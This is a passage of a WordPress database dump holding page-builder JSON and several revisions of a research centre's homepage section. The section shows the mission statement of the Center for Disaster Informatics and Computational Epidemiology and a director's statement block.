c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>-----Director\'s Statement -----<\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','publish','closed','closed','','1224','','','2022-04-29 08:48:47','2022-04-29 12:48:47','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=1224',0,'extb_post_json','',0),(1231,1,'2022-04-29 01:21:12','2022-04-29 05:21:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c62\",\"parentId\":\"453-c61\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c64\",\"parentId\":\"453-c63\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c64\",\"index\":0,\"id\":\"453-c65\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\"}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c66\",\"parentId\":\"453-c63\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c66\",\"index\":0,\"id\":\"453-c67\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c66\",\"index\":1,\"id\":\"453-c68\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c62\",\"index\":0,\"id\":\"453-c63\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c61\",\"parentId\":\"453-c60\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c60\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c38\",\"parentId\":\"453-c37\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c38\",\"index\":0,\"id\":\"453-c39\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c38\",\"index\":1,\"id\":\"453-c40\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c38\",\"index\":2,\"id\":\"453-c41\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c38\",\"index\":3,\"id\":\"453-c42\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c38\",\"index\":4,\"id\":\"453-c43\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c37\",\"parentId\":\"453-c36\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c36\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:21:12','2022-04-29 05:21:12','',1224,'https://gsudice.dataconn.net/?p=1231',0,'revision','',0),(1239,1,'2022-04-29 01:36:48','2022-04-29 05:36:48','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\"}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:36:48','2022-04-29 05:36:48','',1224,'https://gsudice.dataconn.net/?p=1239',0,'revision','',0),(1246,1,'2022-04-29 01:43:49','2022-04-29 05:43:49','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 01:43:49','2022-04-29 05:43:49','',1224,'https://gsudice.dataconn.net/?p=1246',0,'revision','',0),(1254,1,'2022-04-29 08:39:12','2022-04-29 12:39:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/colibri-image-4.png\",\"caption\":{\"text\":\"\"},\"imageId\":38,\"size\":\"thumbnail\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:39:12','2022-04-29 12:39:12','',1224,'https://gsudice.dataconn.net/?p=1254',0,'revision','',0),(1266,1,'2022-04-29 08:48:10','2022-04-29 12:48:10','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>Director\'s Statement <\\/p>\"}},{\"name\":\"hop-image\",\"parentId\":\"453-c13\",\"index\":2,\"id\":\"453-c16\",\"partialId\":453,\"styleRef\":661,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Chetan-Tiwari_300x300-e1651236386247-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1265,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"453-c13\",\"index\":3,\"id\":\"453-c17\",\"partialId\":453,\"styleRef\":662,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":4,\"id\":\"453-c18\",\"partialId\":453,\"styleRef\":663,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}}],\"styleRef\":658,\"type\":\"content\"}],\"id\":\"453-c12\",\"parentId\":\"453-c11\",\"partialId\":453,\"styleRef\":657,\"type\":\"content\"}],\"id\":\"453-c11\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":656,\"type\":\"content\"}],\"id\":\"453-c1\",\"partialId\":453,\"styleRef\":642,\"type\":\"content\"}','','','inherit','closed','closed','','1224-revision-v1','','','2022-04-29 08:48:10','2022-04-29 12:48:10','',1224,'https://gsudice.dataconn.net/?p=1266',0,'revision','',0),(1273,1,'2022-04-29 08:48:47','2022-04-29 12:48:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Features\",\"attrs\":{\"id\":\"features\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c4\",\"parentId\":\"453-c3\",\"partialId\":453,\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"30\"}}}}}}},\"id\":\"453-c6\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c6\",\"index\":0,\"id\":\"453-c7\",\"partialId\":453,\"styleRef\":673,\"type\":\"content\",\"props\":{\"name\":\"icons8-line-awesome\\/connectdevelop\",\"link\":{\"value\":\"\"}}}],\"styleRef\":672,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"80.60\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":\"70\"}}}}}}},\"id\":\"453-c8\",\"parentId\":\"453-c5\",\"partialId\":453,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"453-c8\",\"index\":0,\"id\":\"453-c9\",\"partialId\":453,\"styleRef\":675,\"type\":\"content\",\"props\":{\"content\":\"OUR MISSION\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c8\",\"index\":1,\"id\":\"453-c10\",\"partialId\":453,\"styleRef\":676,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"styleRef\":674,\"type\":\"content\"}],\"parentId\":\"453-c4\",\"index\":0,\"id\":\"453-c5\",\"partialId\":453,\"styleRef\":671,\"type\":\"content\"}],\"styleRef\":670,\"type\":\"content\"}],\"id\":\"453-c3\",\"parentId\":\"453-c2\",\"partialId\":453,\"styleRef\":669,\"type\":\"content\"}],\"id\":\"453-c2\",\"parentId\":\"453-c1\",\"partialId\":453,\"styleRef\":668,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Testimonials\",\"attrs\":{\"id\":\"testimonials\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"453-c13\",\"parentId\":\"453-c12\",\"partialId\":453,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"453-c13\",\"index\":0,\"id\":\"453-c14\",\"partialId\":453,\"styleRef\":659,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/quote-right\"}},{\"name\":\"hop-text\",\"parentId\":\"453-c13\",\"index\":1,\"id\":\"453-c15\",\"partialId\":453,\"styleRef\":660,\"type\":\"content\",\"props\":{\"content\":\"<p>-----Director\'s Statement 